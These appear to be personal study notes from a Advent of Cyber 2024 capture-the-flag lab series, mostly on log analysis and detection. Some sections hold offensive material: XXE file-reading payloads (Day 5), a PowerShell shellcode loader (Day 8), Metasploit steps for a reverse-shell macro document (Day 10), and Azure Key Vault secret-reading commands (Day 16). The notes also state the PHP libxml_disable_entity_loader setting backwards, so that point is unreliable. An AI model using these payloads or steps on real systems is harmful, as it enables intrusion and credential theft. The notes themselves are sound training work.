Things I learned in Advent of Cyber 2024
Day 1 (OPSEC)
Overview
<Review and write later>
Learn more
- Check out the OPSEC room!
Day 2 (True/False Positives) & Day 3 (Log Analysis)
Overview
Learned the following
- ELK (Basic navigation & analysis)
- Kibana Query Language
- Uploading file (shell.php) by guessing admin password
Learn more
- ELK
- Check out the Investigating with ELK 101 room.
Day 4 (Atomic Red Team)
Overview
Reviewed these concepts – Kill Chain, MITRE Technique/Sub-Technique and learned the following.
Atomic Red
The Atomic Red Team library is a collection of red team test cases that are mapped to the MITRE ATT&CK framework.
The library consists of simple test cases that can be executed by any blue team to detect vulnerability gaps and help close them down.
The library also supports automation, where the techniques can be automatically executed. However, it is also possible to execute them manually.
Some basic commands to start with
Get-Help Invoke-AtomictestInvoke-AtomicTest T1566.001 -ShowDetailsInvoke-AtomicTest T1566.001 -TestNumbers 1 -CheckPrereqInvoke-AtomicTest T1566.001 -TestNumbers 1Invoke-AtomicTest T1566.001-1 -cleanup
Detecting the Atomic activities
Open up Event Viewer by clicking the icon in the taskbar, or searching for it in the Start Menu.
Navigate to Applications and Services => Microsoft => Windows => Sysmon => Operational
Detection rules
There are several detection rule formats, including Yara, Sigma, Snort, and more.
Most SIEM accepts this rule (I am yet to learn more about that)
Learn more
- Learn how to harness the power of advanced ELK queries.
- Learn more about the Atomic Red Team via the linked room.
Day 5 (XXE – XML eXternal Entity)
Overview
Learned / revised basic XML and Burp Suite required for this lesson
XML and its components
XML have tags, and values associated with tags.
Example of an XML
<person>
<first_name>Sherlock</first_name>
<postal_address>London</postal_address>
<email>sherlock@example.com</email>
<phone>111000</phone>
</person>
Document Type Definition (DTD)
DTD sets the rule for a particular XML. Rules as to which tags are allowed in a XML document.
Example of a DTD:
<!DOCTYPE person [
<!ELEMENT person(first_name, postal_address, email, phone)>
<!ELEMENT first_name (#PCDATA)>
<!ELEMENT postal_address (#PCDATA)>
<!ELEMENT email (#PCDATA)>
<!ELEMENT phone (#PCDATA)>
]>
In the above example, #PCDATA means parsed data (plain text) (Learn more)
Entities
Entities in XML are placeholders that allow the insertion of large chunks of data or referencing internal or external files.
External entity
An external entity references data from an external file or resource. e.g.
<!DOCTYPE person [
<!ENTITY city SYSTEM "http://example.com/info.txt">
]>
<person>
<first_name>Sherlock</first_name>
<postal_address>&city</postal_address>
<email>sherlock@example.com</email>
<phone>111000</phone>
</person>
The above example refers to an external file by name info.txt at example.com.
This external file will be loaded into the XML, if allowed by the system.
Internal entity
Learn about internal Entity elsewhere
PHP (XML handling)
PHP function
- libxml_disable_entity_loader()
- libxml_disable_entity_loader(true) allows XML parser to load external entities
- libxml_disable_entity_loader(false) disallows XML parser to load external entities
- simplexml_load_string()
- When this function is called with the third parameter = LIBXML_NOENT, and libxml_disable_entity_loader(false) is called previously then the external entity is resolved
Small improvement
I changed the XML payload from
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>
to
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [
<!ENTITY payload1 SYSTEM "/var/www/html/wishes/wish_1.txt">
<!ENTITY payload2 SYSTEM "/var/www/html/wishes/wish_2.txt">
<!ENTITY payload3 SYSTEM "/var/www/html/wishes/wish_3.txt">
<!ENTITY payload4 SYSTEM "/var/www/html/wishes/wish_4.txt"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>
&payload1;
&payload2;
&payload3;
&payload4;
</product_id>
</item>
</wishlist>
My changes are apparently invalid PHP, but it does not affect its purpose for this exercise.
This change allowed me to view four external files instead of a single at a time (by changing the four wish_*.txt with each iteration)
Learn more
- If you want to learn more about the XXE injection attack, check out the XXE room!
Day 6 (Malware analysis, detection, YARA)
Overview
Learn more
- YARA rules syntax
- How to use the standalone tool yara64.exe
- XML syntax specific to EventViewer filter log
- If you want to more about sandboxes, have a look at the room FlareVM: Arsenal of Tools.
Raw / yet unformatted points
- Learned ne of the possible sandbox detection technique for Windows
- YARA rule example
- What did I learn: YARA rule detection can be run independently (It does not necessarily always have to run within SIEMs) using standalone Yara commandline tool (Yara64.exe)
- Powershell’s switch –EncodedCommand allows supplying encoded command for Powershell to decode it first and then run it
- The tool Floss (written by Mandiant) is similar to Linux’s tool strings but is optimized for malware analysis
- Windows EventViewer not only allows viewing the XML used behind the scene for filtering the logs, but also allows manually editing that XML
- It may be a good idea to constantly run a yara detection rule to catch Powershell launched with the switch -EncodedCommand
- The exercise instruction needs to be fixed a little:
Ask user look for the event with the “Command Line:” starting with “C:/Windows/system32/cmd.exe /c reg query” and
supply EventRecordId of that event in the filter XML because for that event the ParentImage reported would be C:\Tools\Malware\MerryChristmas.exe - As expected, when the obfuscated version of the shown C program is run, the yara rule monitoring script did not catch the attempt to detect sandbox.
So, I modified the script like below for this specific obfuscation. NOTE: This solution is not generic. This will work only for this very specific obfuscated string.
rule SANDBOXDETECTED
{
meta:
description = "Detects the sandbox by querying the registry key for Program Path"
author = "TryHackMe"
date = "2024-10-08"
version = "1.1"
strings:
$cmd= "Software\\Microsoft\\Windows\\CurrentVersion\" /v ProgramFilesDir" nocase
$cmdobfus="RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIAIAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA=" nocase
condition:
$cmd or $cmdobfus
}
Day 7 (AWS CloudTrail)
Overview
CloudTrail tracks actions by users, roles, AWS service and records them as events.
CloudTrail
- CloudTrail is enabled for all users by default.
- “Event History” is record of actions for the last 90 days
- Custom trails can be defined for specific actions and/or to retain the records beyond 90 days
- CloudTrail logs can be delivered to CloudWatch
- CloudTrail logs are JSON-formatted
JQ
Learn more
- Want to learn more about log analysis and how to interpret logs from different sources? Check out the Log Universe room!
Raw / yet unformatted points
Day 8 (Shellcode)
Overview
Shellcode is malicious piece of code that injects commands into vulnerable system.
Such commands can do many things if ran at elevated privilege, including giving full or some level of control of the compromised system to the attacker.
Shellcode is used in conjuction with exploits that target known vulnerabilities such as buffer overflow.
Some techniques
- Obfuscation – malicious code is encoded or encrypted to evade signature detection
- Reflective injection – malicious code is loaded directly into memory thus avoiding detection
- Accessing Windows API through Powershell Reflection – Instead of relying on precompiled binaries, this method allows attackers to call Windows API directly at runtime
Reverse Shell
A type of connection where a victim machine is made to initiate connection back to the attacking machine.
This powershell script calls Windows API via C#, and loads the payload
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor= @"
using System
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
Learn more
- Are you interested in learning more about evasion? Take a look at the AV Evasion: Shellcode room.
Day 9 (GRC)
Overview
Learn more
- If you enjoyed this task, feel free to check out the Risk Management room.
Raw / yet unformatted points
Day 10 (Phishing, Macros)
Overview
The exercise showed how to create a malicious docm file with embedded reverse shell code using Metasploit Framework (msfconsole), and also showed how to listen on the attack box for the incoming connection from that reverse shell code.
Using msfconsole
- Use exploit/multi/fileformat/office_word_macro and set payload windows/meterpreter/reverse_tcp to generate docm file with embedded reverse shell code that gives access to the victim system through Meterpreter shell
- Use multi/handler and set payload windows/meterpreter/reverse_tcp to listen for the connection that will be initiated from the victim system when the victim opens the malicious docm file
Word Macro
- The exercise showed with the help of an image how to create new or view existing macros in a Word document (View | Macros | Create)
- The exercise showed with the help of an image that the Comments field of the generated malicious docm file is actually base-64 encoded reverse shell code
- This comment can be copied and pasted in a text file, which can then be decoded on Linux shell using the command: base64 -d comments.txt > payload.exe
- The exercise showed with the help of an image what VirusTotal reports if the payload.exe is sent to VirusTotal for analysis
- The exercise showed with the help of an image what the malicious macro visual basic code reads like when viewed within Word. Essentially, the macro decodes the base64-encoded Comments field using VBasic function Base64Decode(), when the documents is opened. Decoded data is actually the Windows executable reverse-shell code. Macro then saves this code in a temporary file and executes it
Learn more
- More can be learned in this Phishing module.
Day 11 (Wi-Fi attacks: WPA)
Overview
Learn more
- If you enjoyed this task, feel free to check out the Networking module.
Raw / yet unformatted points
Day 12 (HTTP2, Race Conditions)
Overview
Learn more
- Learn more in Race Conditions room!
Raw / yet unformatted points
Day 13 (Websockets)
Overview
- Web Sockets lets the browser and the server keep the communication open
- WebSockets are great for chat, real-time games, or any live data feeds
Burp Suite and WebSocket
Burp Suite has great support for WebSocket.
Burp allows intercepting and manipulation of both – client-to-server as well as server-to-client messages.
Learn more
- Learn more about Burp Suite here: Burp Suite module.
Raw / yet unformatted points
Day 14 (Certificate Mismanagement)
Overview
Learn more
- If you enjoyed this task, feel free to check out the Burp Suite module.
Raw / yet unformatted points
Day 15 (Active Directory)
Overview
Learn more
- If you enjoyed this task, feel free to check out the Active Directory Hardening room
Raw / yet unformatted points
Day 16 (Azure)
Overview
Learning Azure and concepts related to it such as – Azure Key Vault, MS Entra ID, Azure tenant
Azure Key Vault
This service allows user to securely store and access secrets such as API keys, digital certificates, passwords.
Vault owners have full access to the vault, including ability to enable auditing of the vault.
Auditing keeps the record who accessed the vault, when, and what secrets were accessed.
Vault owners can grant permissions to other users, known as Vault Consumers, to access the vault.
Microsoft Entra ID
Microsoft Entra ID is an identity and access management (IAM) service. With oversimplification, it can be said that this service allows configuring what user can access what resources.
Entra ID was formerly known as Azure Active Directory
Azure Roles
- Azure Roles define which resources a user or a group can access
- A newly created user (created via Entra ID), does not have any roles assigned to it
- An administrator must assign a role to users to enable them to view or manage specific resources
- A role can be configured to privilege level ranging from read-only to full-control
- All users that belong to a group inherit the role assigned to the group
The Azure roles we explored in this exercise
- Key Vault Reader: Can read metadata of key vaults and its certificates, keys and secrets
- Key Vault Secrets User: Can read contents of the Key Vault Secret (Only works for key vaults that use the ‘Azure role-based access control’ permission model)
Azure Cloud Shell v/s Azure CLI
Azure Cloud Shell
- Azure Cloud Shell is a browser-based command-line interface.
- It integrates both Bash and PowerShell environments.
- Cloud Shell has built-in tools and pre-configured environments, including Azure CLI, Azure PowerShell, and popular development tools
Azure CLI
- Azure Command-Line Interface (Azure CLI) is a command-line tool for managing and configuring Azure resources.
- Note again that, Azure CLI is part of the built-in tools inside the Cloud Shell
Azure CLI command typical syntax:
az GROUP SUBGROUP ACTION OPTIONAL_PARAMETERS
Azure CLI commands we used in this exercise
az ad signed-in-user show
az ad user list
az ad user list --filter "startsWith('any_prefix_here_', displayName)"
az ad group list
az ad group member list --group "Replace this with group displayName"
az account show
az account clear
az login -u EMAIL -p PASSWORD
az role assignment list --assignee REPLACE_WITH_SECRET_RECOVERY_GROUP_ID --all
az keyvault list
az keyvault secret list --vault-name replace_with_vaultname
az keyvault secret show --vault-name replace_with_vaultname --name replace_with_name_of_the_secret
Learn more
- To practice user and group enumeration in a similar yet different environment visit Exploiting Active Directory room !
Day 17 (Splunk)
Overview
Learned the following:
- Extracting custom fields from logs from new/unknown sources
- Introductory Search Processing Language (SPL)
- Splunk can show statistics neatly
- Splunk is good at showing visualizations in various formats e.g. pie chart, bar chart etc
Learn more
- To learn more about parsing and manipulating data in Splunk visit the Splunk: Data Manipulation room
Day 18 (AI Chatbot)
Overview
Learn more
- Sharpen prompt injecting skill by visiting “Van Chatty” (Day 1) of Advent of Cyber 2023.
Raw / yet unformatted points
Day 19 (Manipulating library/DLL API using Frida)
Overview
Frida is an instrumentation tool that interjects itself between a specified target application and the libraries (DLL) the application interacts with.
Among other things, Frida, allows hacker to analyze and/or modify parameters and return value to/from library functions.
Frida
Frida creates a thread, aka agent, in the target process. The agent thread will execute some initialization/bootstrap code and inject its (Javascript) code into the target process and thus controls its behaviour in real-time.
That agent thread allows hacker to interact with the application.
Frida Interceptor
One of the crucial functionalities of Frida is the Interceptor, which allows hacker to alter input to and output from the library function called by the application.
Frida command used in this exercise
frida-trace ./target_application -i '*'
- The above command creates handlers for each library function called by the target_application
- The handlers are javascript files – one for each library function
- The above command creates a directory by name __handlers__ and places handlers in it
- By editing these handler files, hacker can setup what to do with intercepted function parameters and return value
Functions used in this exercise
ptr()
ptr()
The above function ptr() –
- is a Frida function
- it allocates space for a variable
- it stores the specified value in it
- it returns the pointer to this newly created and initialized variable
log()
log("Parameter1:" + args[0])
The above function, when placed inside the onEnter() method of a handler, prints/logs in the hexadecimal format the first parameter passed to the library function.
The above example assumes that the library function is being passed at least one parameter.
toInt32()
log("Parameter2:" + args[1].toInt32())
The above function, when placed inside the onEnter() method of a handler, converts the second parameter passed to the library function in the integer format and prints/logs it.
The above example assumes that at least two parameters are passed to the function and the second parameters is of type integer.
Memory.readCString()
log("Parameter3:" + Memory.readCString(args[2]))
The above function, when placed inside the onEnter() method of a handler, treats the third parameter passed to the library function as a string and prints/logs it.
The above example assumes that at least three parameters are passed to the function and the third parameters is of type string.
retval.replace(ptr(ANY MANIPULATED RETURN VALUE))
retval.replace(ptr(ANY MANIPULATED RETURN VALUE))
The above function, when placed inside the onLeave() method of a handler, overrides the originally returned value with the specified manipulated return value.
The above example assumes that the intercepted function returns a value, and that the name of the parameter that holds the return value is retval
Learn more
- Practice “Memories of Christmas Past” from Advent of Cyber 2023.
Day 20 (Traffic Analysis / Wireshark / C2 Server)
Overview
We used Wireshark to detect C2 communication going on between C2 server and the compromised system, and used CyberChef to decrypt AES ECB message sent in the beacon messages (The AES key was found in a different POST message)
Typical C2 Communication
- A compromised system typically sends “I’m alive and here” kind of beacon to C2 server periodically
- C2 server acknowledges the beacons
Learn more
- Learn more about WireShark in these rooms: Wireshark: The Basics, Wireshark: Packet Operations, Wireshark: Traffic Analysis
- Learn more about CyberChef here: CyberChef: The Basics room from the Cyber Security 101 path
Day 21 (Reverse Engineering)
Overview
Learn more
- Visit the x86 Assembly Crash Course room.
Raw / yet unformatted points
Day 22 (Kubernetes and DFIR)
Overview
Learn more
- Visit Intro to Kubernetes for a more in-depth introduction to Kubernetes!
Raw / yet unformatted points
Day 23 (Hashes & Password)
Overview
Learn more
- To learn more about cryptography, we recommend the Cryptography module.
- If you want to practice more hash cracking, please consider the John the Ripper: The Basics room.
Raw / yet unformatted points
- Use and significance of using salt
- Is hash-id.py, a common tool, to determine the hash type?
- Other common tool to identify the hash type: package name-that-hash (command nth)
- john’s switch –rules=wordlist
- john’s switch –rules=single
- john’s switch –show
- What is john’s Jumbo edition? Is it the one installed by default?
- List tools that convert various formats to the format compatible with john:
ls /opt/john/*2john* - What does pdf2john.pl exactly do?
- pdftotext’s switch -upw
Day 24 (MQTT – Communication protocol)
Overview
MQTT (Message Queing Telemetry Transport) protocol is commonly used by IoT devices to communicate to other systems and mobile devices.
MQTT
- MQTT is used by IoT devices for the communication purposes
- MQTT runs over TCP (TODOL: Check if it optionally support UDP)
- MQTT works on pub/sub (publish/subscribe) model
- MQTT client devices can publish messages on various topics, and
other client devices can subscribe to specific topics of interest to them - An MQTT broker receives messages from the clients and distributes to
clients that have subscribed
Wireshark and MQTT activities
In this exercise we saw that Wireshark understands MQTT protocol well, and shows various MQTT activities clearly – such as
- Connect Command and Connect ACK
- Publish Message
- Subscribe Request and Subscribe Ack
MQTT commands
- mosquitto_pub
- mosquitto_sub
- mosquitto_rr
Learn more
Learn more by visiting Wireshark module.